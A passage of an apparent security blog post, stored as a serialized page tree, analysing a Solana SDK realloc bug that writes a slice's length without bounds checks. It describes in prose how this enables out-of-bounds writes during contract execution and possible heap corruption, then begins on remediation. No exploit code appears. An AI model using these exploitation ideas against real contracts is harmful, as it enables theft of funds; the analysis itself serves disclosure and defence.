slice\n",{"type":25,"tag":216,"props":20100,"children":20101},{"class":6922,"line":6769},[20102,20106,20110,20114,20118,20122,20126,20130,20134,20138,20142,20146,20150,20154,20158,20162,20166,20170,20174,20178,20182,20186,20190,20194,20198,20202,20206,20210,20214,20218,20222],{"type":25,"tag":216,"props":20103,"children":20104},{"style":6936},[20105],{"type":31,"value":15743},{"type":25,"tag":216,"props":20107,"children":20108},{"style":6947},[20109],{"type":31,"value":17814},{"type":25,"tag":216,"props":20111,"children":20112},{"style":6953},[20113],{"type":31,"value":6956},{"type":25,"tag":216,"props":20115,"children":20116},{"style":6953},[20117],{"type":31,"value":11093},{"type":25,"tag":216,"props":20119,"children":20120},{"style":6936},[20121],{"type":31,"value":7691},{"type":25,"tag":216,"props":20123,"children":20124},{"style":6953},[20125],{"type":31,"value":13773},{"type":25,"tag":216,"props":20127,"children":20128},{"style":6964},[20129],{"type":31,"value":17974},{"type":25,"tag":216,"props":20131,"children":20132},{"style":6936},[20133],{"type":31,"value":17670},{"type":25,"tag":216,"props":20135,"children":20136},{"style":6953},[20137],{"type":31,"value":179},{"type":25,"tag":216,"props":20139,"children":20140},{"style":6964},[20141],{"type":31,"value":7669},{"type":25,"tag":216,"props":20143,"children":20144},{"style":6953},[20145],{"type":31,"value":179},{"type":25,"tag":216,"props":20147,"children":20148},{"style":7047},[20149],{"type":31,"value":17995},{"type":25,"tag":216,"props":20151,"children":20152},{"style":6964},[20153],{"type":31,"value":18000},{"type":25,"tag":216,"props":20155,"children":20156},{"style":6936},[20157],{"type":31,"value":12795},{"type":25,"tag":216,"props":20159,"children":20160},{"style":6953},[20161],{"type":31,"value":13773},{"type":25,"tag":216,"props":20163,"children":20164},{"style":6936},[20165],{"type":31,"value":13611},{"type":25,"tag":216,"props":20167,"children":20168},{"style":7375},[20169],{"type":31,"value":9811},{"type":25,"tag":216,"props":20171,"children":20172},{"style":6964},[20173],{"type":31,"value":1888},{"type":25,"tag":216,"props":20175,"children":20176},{"style":6953},[20177],{"type":31,"value":179},{"type":25,"tag":216,"props":20179,"children":20180},{"style":7047},[20181],{"type":31,"value":17858},{"type":25,"tag":216,"props":20183,"children":20184},{"style":6964},[20185],{"type":31,"value":1850},{"type":25,"tag":216,"props":20187,"children":20188},{"style":6989},[20189],{"type":31,"value":184},{"type":25,"tag":216,"props":20191,"children":20192},{"style":6964},[20193],{"type":31,"value":7036},{"type":25,"tag":216,"props":20195,"children":20196},{"style":6936},[20197],{"type":31,"value":12795},{"type":25,"tag":216,"props":20199,"children":20200},{"style":7375},[20201],{"type":31,"value":9811},{"type":25,"tag":216,"props":20203,"children":20204},{"style":6964},[20205],{"type":31,"value":7036},{"type":25,"tag":216,"props":20207,"children":20208},{"style":6936},[20209],{"type":31,"value":12795},{"type":25,"tag":216,"props":20211,"children":20212},{"style":6953},[20213],{"type":31,"value":13773},{"type":25,"tag":216,"props":20215,"children":20216},{"style":6936},[20217],{"type":31,"value":7691},{"type":25,"tag":216,"props":20219,"children":20220},{"style":7375},[20221],{"type":31,"value":9811},{"type":25,"tag":216,"props":20223,"children":20224},{"style":6964},[20225],{"type":31,"value":7797},{"type":25,"tag":216,"props":20227,"children":20228},{"class":6922,"line":6778},[20229,20233,20237,20241,20245,20249,20253],{"type":25,"tag":216,"props":20230,"children":20231},{"style":6953},[20232],{"type":31,"value":8519},{"type":25,"tag":216,"props":20234,"children":20235},{"style":6947},[20236],{"type":31,"value":17906},{"type":25,"tag":216,"props":20238,"children":20239},{"style":6953},[20240],{"type":31,"value":6956},{"type":25,"tag":216,"props":20242,"children":20243},{"style":6947},[20244],{"type":31,"value":17915},{"type":25,"tag":216,"props":20246,"children":20247},{"style":6936},[20248],{"type":31,"value":12781},{"type":25,"tag":216,"props":20250,"children":20251},{"style":7375},[20252],{"type":31,"value":9811},{"type":25,"tag":216,"props":20254,"children":20255},{"style":6964},[20256],{"type":31,"value":6967},{"type":25,"tag":38,"props":20258,"children":20259},{},[20260,20262,20268,20270,20281,20283,20289,20291,20297,20299,20304,20306,20311,20313,20323,20324,20331,20332,20339,20346,20348,20354,20356,20362,20364,20369,20371,20376,20378,20384,20386,20391],{"type":31,"value":20261},"That ",{"type":25,"tag":82,"props":20263,"children":20265},{"className":20264},[],[20266],{"type":31,"value":20267},"as_ptr()",{"type":31,"value":20269}," call is ",{"type":25,"tag":162,"props":20271,"children":20274},{"href":20272,"rel":20273},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.as_ptr",[166],[20275],{"type":25,"tag":82,"props":20276,"children":20278},{"className":20277},[],[20279],{"type":31,"value":20280},"RefCell::as_ptr()",{"type":31,"value":20282}," due to the ",{"type":25,"tag":82,"props":20284,"children":20286},{"className":20285},[],[20287],{"type":31,"value":20288},"Deref",{"type":31,"value":20290}," impl on ",{"type":25,"tag":82,"props":20292,"children":20294},{"className":20293},[],[20295],{"type":31,"value":20296},"Rc",{"type":31,"value":20298}," (remember also that ",{"type":25,"tag":82,"props":20300,"children":20302},{"className":20301},[],[20303],{"type":31,"value":19461},{"type":31,"value":20305}," itself doesn't behave like a reference, you need to actually ",{"type":25,"tag":64,"props":20307,"children":20308},{},[20309],{"type":31,"value":20310},"get",{"type":31,"value":20312}," one through ",{"type":25,"tag":162,"props":20314,"children":20317},{"href":20315,"rel":20316},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow",[166],[20318],{"type":25,"tag":82,"props":20319,"children":20321},{"className":20320},[],[20322],{"type":31,"value":12755},{"type":31,"value":10409},{"type":25,"tag":162,"props":20325,"children":20328},{"href":20326,"rel":20327},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow_mut",[166],[20329],{"type":31,"value":20330},"and",{"type":31,"value":10409},{"type":25,"tag":162,"props":20333,"children":20336},{"href":20334,"rel":20335},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow",[166],[20337],{"type":31,"value":20338},"frie",{"type":25,"tag":162,"props":20340,"children":20343},{"href":20341,"rel":20342},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow_mut",[166],[20344],{"type":31,"value":20345},"nds",{"type":31,"value":20347},"). So from ",{"type":25,"tag":82,"props":20349,"children":20351},{"className":20350},[],[20352],{"type":31,"value":20353},"RefCell::\u003C&mut [u8]>::as_mut()",{"type":31,"value":20355}," we get a ",{"type":25,"tag":82,"props":20357,"children":20359},{"className":20358},[],[20360],{"type":31,"value":20361},"*mut &mut [u8]",{"type":31,"value":20363}," - a ",{"type":25,"tag":64,"props":20365,"children":20366},{},[20367],{"type":31,"value":20368},"pointer",{"type":31,"value":20370}," to the ",{"type":25,"tag":64,"props":20372,"children":20373},{},[20374],{"type":31,"value":20375},"slice reference",{"type":31,"value":20377},". From here, we turn the pointer into a ",{"type":25,"tag":82,"props":20379,"children":20381},{"className":20380},[],[20382],{"type":31,"value":20383},"*const u64",{"type":31,"value":20385}," pointer and then offset by 1 ",{"type":25,"tag":82,"props":20387,"children":20389},{"className":20388},[],[20390],{"type":31,"value":11994},{"type":31,"value":20392}," (so 8 bytes). Finally, we switch the pointer back to being mutable, and write the new length to it.",{"type":25,"tag":38,"props":20394,"children":20395},{},[20396,20398,20403,20405,20410,20412,20417,20419,20424,20426,20432],{"type":31,"value":20397},"Now, if you're sitting here thinking that this is unnecessarily convoluted and confusing, you'd be right! But we'll get back to that ",{"type":25,"tag":162,"props":20399,"children":20401},{"href":20400},"#Towards-safer-unsafe",[20402],{"type":31,"value":20070},{"type":31,"value":20404}," too, I promise. In summary, we're writing the new length as a ",{"type":25,"tag":82,"props":20406,"children":20408},{"className":20407},[],[20409],{"type":31,"value":11994},{"type":31,"value":20411}," to the region starting 8 bytes from the start of the slice ",{"type":25,"tag":64,"props":20413,"children":20414},{},[20415],{"type":31,"value":20416},"reference",{"type":31,"value":20418}," (the ",{"type":25,"tag":82,"props":20420,"children":20422},{"className":20421},[],[20423],{"type":31,"value":19420},{"type":31,"value":20425},").So, what does ",{"type":25,"tag":82,"props":20427,"children":20429},{"className":20428},[],[20430],{"type":31,"value":20431},"&[T]",{"type":31,"value":20433}," look like in Rust?",{"type":25,"tag":38,"props":20435,"children":20436},{},[20437,20439,20446,20448,20461,20463,20469],{"type":31,"value":20438},"According to ",{"type":25,"tag":162,"props":20440,"children":20443},{"href":20441,"rel":20442},"https://doc.rust-lang.org/reference/type-layout.html#pointers-and-references-layout",[166],[20444],{"type":31,"value":20445},"the reference",{"type":31,"value":20447},", it's completely undefined - there are no guarantees made in the reference, and ",{"type":25,"tag":162,"props":20449,"children":20452},{"href":20450,"rel":20451},"https://doc.rust-lang.org/reference/type-layout.html",[166],[20453,20455,20459],{"type":31,"value":20454},"\"Type layout can be changed with each compilation. ",{"type":25,"tag":216,"props":20456,"children":20457},{},[20458],{"type":31,"value":13547},{"type":31,"value":20460}," we only document what is guaranteed today\"",{"type":31,"value":20462},". But it seems like those pesky language specs aren't stopping Solana developers. In current ",{"type":25,"tag":82,"props":20464,"children":20466},{"className":20465},[],[20467],{"type":31,"value":20468},"rustc",{"type":31,"value":20470},", the layout is a data pointer followed by the size; essentially the same as:",{"type":25,"tag":206,"props":20472,"children":20475},{"className":20473,"code":20474,"language":2254,"meta":7,"style":7},"language-c shiki shiki-themes slack-dark","// C language\nstruct slice_ref {\n    void* ptr;\n    size_t len;\n};\n",[20476],{"type":25,"tag":82,"props":20477,"children":20478},{"__ignoreMap":7},[20479,20487,20499,20516,20529],{"type":25,"tag":216,"props":20480,"children":20481},{"class":6922,"line":6923},[20482],{"type":25,"tag":216,"props":20483,"children":20484},{"style":6927},[20485],{"type":31,"value":20486},"// C language\n",{"type":25,"tag":216,"props":20488,"children":20489},{"class":6922,"line":6769},[20490,20494],{"type":25,"tag":216,"props":20491,"children":20492},{"style":6936},[20493],{"type":31,"value":13357},{"type":25,"tag":216,"props":20495,"children":20496},{"style":6964},[20497],{"type":31,"value":20498}," slice_ref {\n",{"type":25,"tag":216,"props":20500,"children":20501},{"class":6922,"line":6778},[20502,20507,20511],{"type":25,"tag":216,"props":20503,"children":20504},{"style":6936},[20505],{"type":31,"value":20506},"    void",{"type":25,"tag":216,"props":20508,"children":20509},{"style":6953},[20510],{"type":31,"value":8519},{"type":25,"tag":216,"props":20512,"children":20513},{"style":6964},[20514],{"type":31,"value":20515}," ptr;\n",{"type":25,"tag":216,"props":20517,"children":20518},{"class":6922,"line":7005},[20519,20524],{"type":25,"tag":216,"props":20520,"children":20521},{"style":6936},[20522],{"type":31,"value":20523},"    size_t",{"type":25,"tag":216,"props":20525,"children":20526},{"style":6964},[20527],{"type":31,"value":20528}," len;\n",{"type":25,"tag":216,"props":20530,"children":20531},{"class":6922,"line":7110},[20532],{"type":25,"tag":216,"props":20533,"children":20534},{"style":6964},[20535],{"type":31,"value":20536},"};\n",{"type":25,"tag":38,"props":20538,"children":20539},{},[20540],{"type":31,"value":20541},"So at the end of the day we find out that the code is simply writing over the length field in the slice reference. Let's step back a moment and take a look at all the assumptions we made along the way while executing these 2 lines (really only one of importance!):",{"type":25,"tag":6711,"props":20543,"children":20544},{},[20545,20550,20568],{"type":25,"tag":2043,"props":20546,"children":20547},{},[20548],{"type":31,"value":20549},"Slices are laid out in the precise manner described",{"type":25,"tag":2043,"props":20551,"children":20552},{},[20553,20555,20561,20563],{"type":31,"value":20554},"Pointers and ",{"type":25,"tag":82,"props":20556,"children":20558},{"className":20557},[],[20559],{"type":31,"value":20560},"usize",{"type":31,"value":20562}," are the same width as ",{"type":25,"tag":82,"props":20564,"children":20566},{"className":20565},[],[20567],{"type":31,"value":11994},{"type":25,"tag":2043,"props":20569,"children":20570},{},[20571,20572,20577],{"type":31,"value":474},{"type":25,"tag":82,"props":20573,"children":20575},{"className":20574},[],[20576],{"type":31,"value":19461},{"type":31,"value":20578}," was not borrowed (i.e. we didn't just mutate it while someone else has a reference to its contents)",{"type":25,"tag":38,"props":20580,"children":20581},{},[20582,20584,20589,20591,20597,20599,20604,20606,20612,20614,20619,20621,20631],{"type":31,"value":20583},"Assumption #2 is ",{"type":25,"tag":64,"props":20585,"children":20586},{},[20587],{"type":31,"value":20588},"probably",{"type":31,"value":20590}," fine when we only care about targeting Solana's bytecode machine, but still not a particularly safe assumption to make in case some change happens on the toolchain. And assumption #3 turns out to be a non-issue since we had just done a ",{"type":25,"tag":82,"props":20592,"children":20594},{"className":20593},[],[20595],{"type":31,"value":20596},"borrow_mut",{"type":31,"value":20598}," of the ",{"type":25,"tag":82,"props":20600,"children":20602},{"className":20601},[],[20603],{"type":31,"value":19461},{"type":31,"value":20605}," (through ",{"type":25,"tag":82,"props":20607,"children":20609},{"className":20608},[],[20610],{"type":31,"value":20611},"AccountInfo::try_borrow_mut_data()",{"type":31,"value":20613},"), and ",{"type":25,"tag":82,"props":20615,"children":20617},{"className":20616},[],[20618],{"type":31,"value":19461},{"type":31,"value":20620}," is not usable between multiple threads",{"type":25,"tag":19431,"props":20622,"children":20623},{},[20624],{"type":25,"tag":162,"props":20625,"children":20629},{"href":20626,"ariaDescribedBy":20627,"dataFootnoteRef":7,"id":20628},"#user-content-fn-sendsync",[19438],"user-content-fnref-sendsync",[20630],{"type":31,"value":331},{"type":31,"value":20632},", so we already have exclusive access.",{"type":25,"tag":38,"props":20634,"children":20635},{},[20636,20638,20642],{"type":31,"value":20637},"A few more ",{"type":25,"tag":64,"props":20639,"children":20640},{},[20641],{"type":31,"value":11059},{"type":31,"value":20643}," things of note, that could have gone badly but didn't:",{"type":25,"tag":2039,"props":20645,"children":20646},{},[20647,20689],{"type":25,"tag":2043,"props":20648,"children":20649},{},[20650,20652,20658,20660,20665,20667,20672,20674,20679,20681,20687],{"type":31,"value":20651},"By reborrowing the pointer (the ",{"type":25,"tag":82,"props":20653,"children":20655},{"className":20654},[],[20656],{"type":31,"value":20657},"&mut *(\u003Cvalue of type *mut u64>)",{"type":31,"value":20659},"), we've created a reference with an ",{"type":25,"tag":64,"props":20661,"children":20662},{},[20663],{"type":31,"value":20664},"unbounded lifetime",{"type":31,"value":20666},". Rust is free to infer ",{"type":25,"tag":64,"props":20668,"children":20669},{},[20670],{"type":31,"value":20671},"any",{"type":31,"value":20673}," lifetime for ",{"type":25,"tag":82,"props":20675,"children":20677},{"className":20676},[],[20678],{"type":31,"value":17906},{"type":31,"value":20680}," (including ",{"type":25,"tag":82,"props":20682,"children":20684},{"className":20683},[],[20685],{"type":31,"value":20686},"'static",{"type":31,"value":20688},"); thankfully it's only used in the next statement and never has a chance to escape.",{"type":25,"tag":2043,"props":20690,"children":20691},{},[20692,20694,20700,20702,20707,20709,20714,20716,20721,20723,20728,20730,20735,20737,20742,20744,20750,20752,20757,20759,20764,20766,20771,20773,20778,20780,20785],{"type":31,"value":20693},"Going back to the first statement when we were modifying the data buffer, it turns out we have another lifetime problem: we created a mutable pointer to the data from the ",{"type":25,"tag":82,"props":20695,"children":20697},{"className":20696},[],[20698],{"type":31,"value":20699},"RefMut",{"type":31,"value":20701}," returned from ",{"type":25,"tag":82,"props":20703,"children":20705},{"className":20704},[],[20706],{"type":31,"value":17831},{"type":31,"value":20708},", but the ",{"type":25,"tag":82,"props":20710,"children":20712},{"className":20711},[],[20713],{"type":31,"value":20699},{"type":31,"value":20715}," is dropped at the end of the statement. So, we now have in ",{"type":25,"tag":82,"props":20717,"children":20719},{"className":20718},[],[20720],{"type":31,"value":17906},{"type":31,"value":20722}," a ",{"type":25,"tag":64,"props":20724,"children":20725},{},[20726],{"type":31,"value":20727},"mutable",{"type":31,"value":20729}," pointer to the ",{"type":25,"tag":82,"props":20731,"children":20733},{"className":20732},[],[20734],{"type":31,"value":19461},{"type":31,"value":20736},"'s data, but the ",{"type":25,"tag":82,"props":20738,"children":20740},{"className":20739},[],[20741],{"type":31,"value":19461},{"type":31,"value":20743}," thinks that we're done with our borrow. If we happened to be in a multithreaded scenario with something like a ",{"type":25,"tag":82,"props":20745,"children":20747},{"className":20746},[],[20748],{"type":31,"value":20749},"Mutex",{"type":31,"value":20751}," instead of a ",{"type":25,"tag":82,"props":20753,"children":20755},{"className":20754},[],[20756],{"type":31,"value":19461},{"type":31,"value":20758}," (but with otherwise semantically identical code), then a different thread could attempt to borrow between creating ",{"type":25,"tag":82,"props":20760,"children":20762},{"className":20761},[],[20763],{"type":31,"value":17906},{"type":31,"value":20765}," and writing to it ",{"type":25,"tag":64,"props":20767,"children":20768},{},[20769],{"type":31,"value":20770},"and succeed",{"type":31,"value":20772},", resulting in us writing while another reference is alive. However, since ",{"type":25,"tag":82,"props":20774,"children":20776},{"className":20775},[],[20777],{"type":31,"value":17906},{"type":31,"value":20779}," is behind the actual data and thus the region it points to is inaccessible through the ",{"type":25,"tag":82,"props":20781,"children":20783},{"className":20782},[],[20784],{"type":31,"value":7669},{"type":31,"value":20786}," slice, this is still not a problem. I just wanted to highlight how easy it is to mess up borrowing and lifetimes when writing unsafe code.",{"type":25,"tag":38,"props":20788,"children":20789},{},[20790,20792,20797],{"type":31,"value":20791},"Ok, now that we've understood what the code is ",{"type":25,"tag":64,"props":20793,"children":20794},{},[20795],{"type":31,"value":20796},"trying",{"type":31,"value":20798}," to do, let's try to break it, shall we?",{"type":25,"tag":26,"props":20800,"children":20802},{"id":20801},"what-can-go-wrong",[20803],{"type":31,"value":20804},"What can go wrong?",{"type":25,"tag":606,"props":20806,"children":20808},{"id":20807},"contracts",[20809],{"type":31,"value":20810},"Contracts",{"type":25,"tag":38,"props":20812,"children":20813},{},[20814,20816,20821,20823,20828,20830,20835,20837,20842],{"type":31,"value":20815},"Again, it's quite conspicuous that there's no bounds check whatsoever, and additionally, we notice that at no point did we actually touch the data pointer of the slice reference when ",{"type":25,"tag":82,"props":20817,"children":20819},{"className":20818},[],[20820],{"type":31,"value":17595},{"type":31,"value":20822},"'ing. In other words, when we realloc, all we do is change some size fields, no allocation is happening. So, if we ",{"type":25,"tag":82,"props":20824,"children":20826},{"className":20825},[],[20827],{"type":31,"value":17595},{"type":31,"value":20829}," to some large size, past the end of the buffer of roughly ",{"type":25,"tag":82,"props":20831,"children":20833},{"className":20832},[],[20834],{"type":31,"value":19250},{"type":31,"value":20836}," bytes in the serialized buffer from the BPF loader, then we've got free out-of-bounds memory write! Using the ",{"type":25,"tag":82,"props":20838,"children":20840},{"className":20839},[],[20841],{"type":31,"value":7669},{"type":31,"value":20843}," slice, we can write to anything \"after\" our account's data in memory. Other accounts' data are stored adjacent in memory, so it'd be pretty easy to modify the data or lamports. And remember, sizes and indices are unsigned, so what's \"behind\" our account in memory is actually just very far \"after\" our account - the address will wrap around the end of the address space.",{"type":25,"tag":38,"props":20845,"children":20846},{},[20847,20849,20856],{"type":31,"value":20848},"There is ",{"type":25,"tag":162,"props":20850,"children":20853},{"href":20851,"rel":20852},"https://github.com/solana-labs/solana/blob/94685e1222b3289859a447d62fadea20898241e0/programs/bpf_loader/src/serialization.rs#L324-L328",[166],[20854],{"type":31,"value":20855},"a check",{"type":31,"value":20857}," by the BPF loader, however, and it boils down to:",{"type":25,"tag":206,"props":20859,"children":20861},{"className":6915,"code":20860,"language":6914,"meta":7,"style":7},"if post_len.saturating_sub(*pre_len) > MAX_PERMITTED_DATA_INCREASE\n    || post_len > MAX_PERMITTED_DATA_LENGTH as usize\n{\n    return Err(InstructionError::InvalidRealloc);\n}\n",[20862],{"type":25,"tag":82,"props":20863,"children":20864},{"__ignoreMap":7},[20865,20903,20933,20940,20973],{"type":25,"tag":216,"props":20866,"children":20867},{"class":6922,"line":6923},[20868,20872,20877,20881,20885,20889,20893,20898],{"type":25,"tag":216,"props":20869,"children":20870},{"style":6973},[20871],{"type":31,"value":19537},{"type":25,"tag":216,"props":20873,"children":20874},{"style":6947},[20875],{"type":31,"value":20876}," post_len",{"type":25,"tag":216,"props":20878,"children":20879},{"style":6953},[20880],{"type":31,"value":179},{"type":25,"tag":216,"props":20882,"children":20883},{"style":7047},[20884],{"type":31,"value":18249},{"type":25,"tag":216,"props":20886,"children":20887},{"style":6964},[20888],{"type":31,"value":1850},{"type":25,"tag":216,"props":20890,"children":20891},{"style":6953},[20892],{"type":31,"value":8519},{"type":25,"tag":216,"props":20894,"children":20895},{"style":6947},[20896],{"type":31,"value":20897},"pre_len",{"type":25,"tag":216,"props":20899,"children":20900},{"style":6964},[20901],{"type":31,"value":20902},") > MAX_PERMITTED_DATA_INCREASE\n",{"type":25,"tag":216,"props":20904,"children":20905},{"class":6922,"line":6769},[20906,20911,20915,20919,20924,20928],{"type":25,"tag":216,"props":20907,"children":20908},{"style":6953},[20909],{"type":31,"value":20910},"    ||",{"type":25,"tag":216,"props":20912,"children":20913},{"style":6947},[20914],{"type":31,"value":20876},{"type":25,"tag":216,"props":20916,"children":20917},{"style":6953},[20918],{"type":31,"value":18151},{"type":25,"tag":216,"props":20920,"children":20921},{"style":6964},[20922],{"type":31,"value":20923}," MAX_PERMITTED_DATA_LENGTH ",{"type":25,"tag":216,"props":20925,"children":20926},{"style":6936},[20927],{"type":31,"value":12795},{"type":25,"tag":216,"props":20929,"children":20930},{"style":7375},[20931],{"type":31,"value":20932}," usize\n",{"type":25,"tag":216,"props":20934,"children":20935},{"class":6922,"line":6778},[20936],{"type":25,"tag":216,"props":20937,"children":20938},{"style":6964},[20939],{"type":31,"value":14836},{"type":25,"tag":216,"props":20941,"children":20942},{"class":6922,"line":7005},[20943,20948,20952,20956,20960,20964,20969],{"type":25,"tag":216,"props":20944,"children":20945},{"style":6973},[20946],{"type":31,"value":20947},"    return",{"type":25,"tag":216,"props":20949,"children":20950},{"style":7375},[20951],{"type":31,"value":19707},{"type":25,"tag":216,"props":20953,"children":20954},{"style":6964},[20955],{"type":31,"value":1850},{"type":25,"tag":216,"props":20957,"children":20958},{"style":7375},[20959],{"type":31,"value":19716},{"type":25,"tag":216,"props":20961,"children":20962},{"style":6953},[20963],{"type":31,"value":7438},{"type":25,"tag":216,"props":20965,"children":20966},{"style":7375},[20967],{"type":31,"value":20968},"InvalidRealloc",{"type":25,"tag":216,"props":20970,"children":20971},{"style":6964},[20972],{"type":31,"value":7797},{"type":25,"tag":216,"props":20974,"children":20975},{"class":6922,"line":7110},[20976],{"type":25,"tag":216,"props":20977,"children":20978},{"style":6964},[20979],{"type":31,"value":7874},{"type":25,"tag":38,"props":20981,"children":20982},{},[20983,20985,20990,20992,20997],{"type":31,"value":20984},"But, like the other checks performed by the loader, this check only runs after the contract ",{"type":25,"tag":64,"props":20986,"children":20987},{},[20988],{"type":31,"value":20989},"finishes",{"type":31,"value":20991}," execution. ",{"type":25,"tag":64,"props":20993,"children":20994},{},[20995],{"type":31,"value":20996},"During",{"type":31,"value":20998}," execution, the contract is free to make whatever modifications to memory that it wants, since Solana's eBPF machine doesn't hook memory accesses in any way.",{"type":25,"tag":38,"props":21000,"children":21001},{},[21002,21004,21009,21011,21016,21018,21025],{"type":31,"value":21003},"The end result is that in order to successfully exploit this bug, an attacker needs a way to change the length back to something valid before the program exits. However, with potentially ",{"type":25,"tag":64,"props":21005,"children":21006},{},[21007],{"type":31,"value":21008},"arbitrary",{"type":31,"value":21010}," memory access through a mistakenly-",{"type":25,"tag":82,"props":21012,"children":21014},{"className":21013},[],[21015],{"type":31,"value":17595},{"type":31,"value":21017},"'d account, this falls in the relm of some ",{"type":25,"tag":162,"props":21019,"children":21022},{"href":21020,"rel":21021},"https://en.wikipedia.org/wiki/Buffer_overflow",[166],[21023],{"type":31,"value":21024},"old-school pwning",{"type":31,"value":21026}," - even if we can't use the out-of-bounds access directly, there's plenty of pointers in memory that could be of use.",{"type":25,"tag":606,"props":21028,"children":21030},{"id":21029},"not-contracts",[21031],{"type":31,"value":21032},"Not-contracts?",{"type":25,"tag":38,"props":21034,"children":21035},{},[21036,21038,21043,21045,21055,21057,21069,21071,21078,21080,21085,21087,21092,21094,21107,21109,21114,21116,21121],{"type":31,"value":21037},"Remember when we said that all this code makes sense ",{"type":25,"tag":64,"props":21039,"children":21040},{},[21041],{"type":31,"value":21042},"if the data points to the BPF loader's serialized buffer",{"type":31,"value":21044},"? Well unfortunately for us, there's nothing enforcing that; all the fields on ",{"type":25,"tag":162,"props":21046,"children":21049},{"href":21047,"rel":21048},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html",[166],[21050],{"type":25,"tag":82,"props":21051,"children":21053},{"className":21052},[],[21054],{"type":31,"value":18896},{"type":31,"value":21056}," are public, and so is its ",{"type":25,"tag":162,"props":21058,"children":21061},{"href":21059,"rel":21060},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html#method.new",[166],[21062,21067],{"type":25,"tag":82,"props":21063,"children":21065},{"className":21064},[],[21066],{"type":31,"value":19080},{"type":31,"value":21068}," method",{"type":31,"value":21070}," (which is ",{"type":25,"tag":162,"props":21072,"children":21075},{"href":21073,"rel":21074},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#160-180",[166],[21076],{"type":31,"value":21077},"nothing more than a thin wrapper around just creating the struct literal yourself",{"type":31,"value":21079},"). The ",{"type":25,"tag":82,"props":21081,"children":21083},{"className":21082},[],[21084],{"type":31,"value":17595},{"type":31,"value":21086}," code critically assumes that the memory 8 bytes behind the data buffer is the data's length and that we can write to it however we want when realloc'ing. So, clearly if we were to create an ",{"type":25,"tag":82,"props":21088,"children":21090},{"className":21089},[],[21091],{"type":31,"value":18896},{"type":31,"value":21093}," ourselves - potentially through the ",{"type":25,"tag":162,"props":21095,"children":21098},{"href":21096,"rel":21097},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/trait.Account.html",[166],[21099,21105],{"type":25,"tag":82,"props":21100,"children":21102},{"className":21101},[],[21103],{"type":31,"value":21104},"Account",{"type":31,"value":21106}," trait",{"type":31,"value":21108},", which is hardly documented at all and makes ",{"type":25,"tag":64,"props":21110,"children":21111},{},[21112],{"type":31,"value":21113},"no",{"type":31,"value":21115}," mention of any prerequisites about the nature of the references that need to be returned - we'd run in to problems from pretty much any practical way we'd allocate the ",{"type":25,"tag":82,"props":21117,"children":21119},{"className":21118},[],[21120],{"type":31,"value":7669},{"type":31,"value":21122}," buffer.",{"type":25,"tag":38,"props":21124,"children":21125},{},[21126,21128,21139,21141,21147,21149,21155,21157,21169,21171,21176,21178,21183,21185,21190,21192,21197,21199,21204,21206,21211],{"type":31,"value":21127},"One long arm of this is ",{"type":25,"tag":162,"props":21129,"children":21132},{"href":21130,"rel":21131},"https://docs.rs/solana-sdk/1.10.28/solana_sdk/account/struct.Account.html",[166],[21133],{"type":25,"tag":82,"props":21134,"children":21136},{"className":21135},[],[21137],{"type":31,"value":21138},"solana_sdk::account::Account",{"type":31,"value":21140}," - in the client SDK. It holds an account's data in a ",{"type":25,"tag":82,"props":21142,"children":21144},{"className":21143},[],[21145],{"type":31,"value":21146},"Vec\u003Cu8>",{"type":31,"value":21148},", and it implements ",{"type":25,"tag":82,"props":21150,"children":21152},{"className":21151},[],[21153],{"type":31,"value":21154},"solana_program::account_info::Account",{"type":31,"value":21156}," (the trait from earlier) - by ",{"type":25,"tag":162,"props":21158,"children":21161},{"href":21159,"rel":21160},"https://docs.rs/solana-sdk/1.10.28/src/solana_sdk/account.rs.html#661-669",[166],[21162,21164],{"type":31,"value":21163},"returning a reference to the contents of that ",{"type":25,"tag":82,"props":21165,"children":21167},{"className":21166},[],[21168],{"type":31,"value":906},{"type":31,"value":21170},". So, ",{"type":25,"tag":82,"props":21172,"children":21174},{"className":21173},[],[21175],{"type":31,"value":17595},{"type":31,"value":21177}," writes the size into the 8 bytes right before ",{"type":25,"tag":82,"props":21179,"children":21181},{"className":21180},[],[21182],{"type":31,"value":7669},{"type":31,"value":21184},"; ",{"type":25,"tag":82,"props":21186,"children":21188},{"className":21187},[],[21189],{"type":31,"value":7669},{"type":31,"value":21191}," is the buffer of a ",{"type":25,"tag":82,"props":21193,"children":21195},{"className":21194},[],[21196],{"type":31,"value":906},{"type":31,"value":21198},", and so it is the contents of a heap allocation; and, immediately before a heap allocation sits critical metadata. The result? If, for some reason, you construct an ",{"type":25,"tag":82,"props":21200,"children":21202},{"className":21201},[],[21203],{"type":31,"value":18896},{"type":31,"value":21205}," out of an SDK ",{"type":25,"tag":82,"props":21207,"children":21209},{"className":21208},[],[21210],{"type":31,"value":21104},{"type":31,"value":21212}," and then realloc it (which admittedly is quite a stretch), then you get heap corruption - something that's very likely to lead to remote code execution.",{"type":25,"tag":26,"props":21214,"children":21216},{"id":21215},"remediation",[21217],{"type":31,"value":21218},"Remediation",{"type":25,"tag":38,"props":21220,"children":21221},{},[21222],{"type":31,"value":21223},"Obviously the fix for the main issue at hand is to check that the resize operation remains in-bounds. But how do we know how big is too big?",{"type":25,"tag":38,"props":21225,"children":21226},{},[21227,21229,21234,21236,21241,21243,21254,21256,21261,21263,21270],{"type":31,"value":21228},"The sensible thing to do would be to store the initial size in the ",{"type":25,"tag":82,"props":21230,"children":21232},{"className":21231},[],[21233],{"type":31,"value":18896},{"type":31,"value":21235},"... except for the fact that the layout of ",{"type":25,"tag":82,"props":21237,"children":21239},{"className":21238},[],[21240],{"type":31,"value":18896},{"type":31,"value":21242}," is actually part of the ABI between the contract runtime and the loader :face_palm:",{"type":25,"tag":19431,"props":21244,"children":21245},{},[21246],{"type":25,"tag":162,"props":21247,"children":21251},{"href":21248,"ariaDescribedBy":21249,"dataFootnoteRef":7,"id":21250},"#user-content-fn-layout",[19438],"user-content-fnref-layout",[21252],{"type":31,"value":21253},"3",{"type":31,"value":21255}," So, with changing ",{"type":25,"tag":82,"props":21257,"children":21259},{"className":21258},[],[21260],{"type":31,"value":18896},{"type":31,"value":21262}," out of the question, the Solana team came up with a different place to stash the information: inside a section of padding in the serialized buffer passed 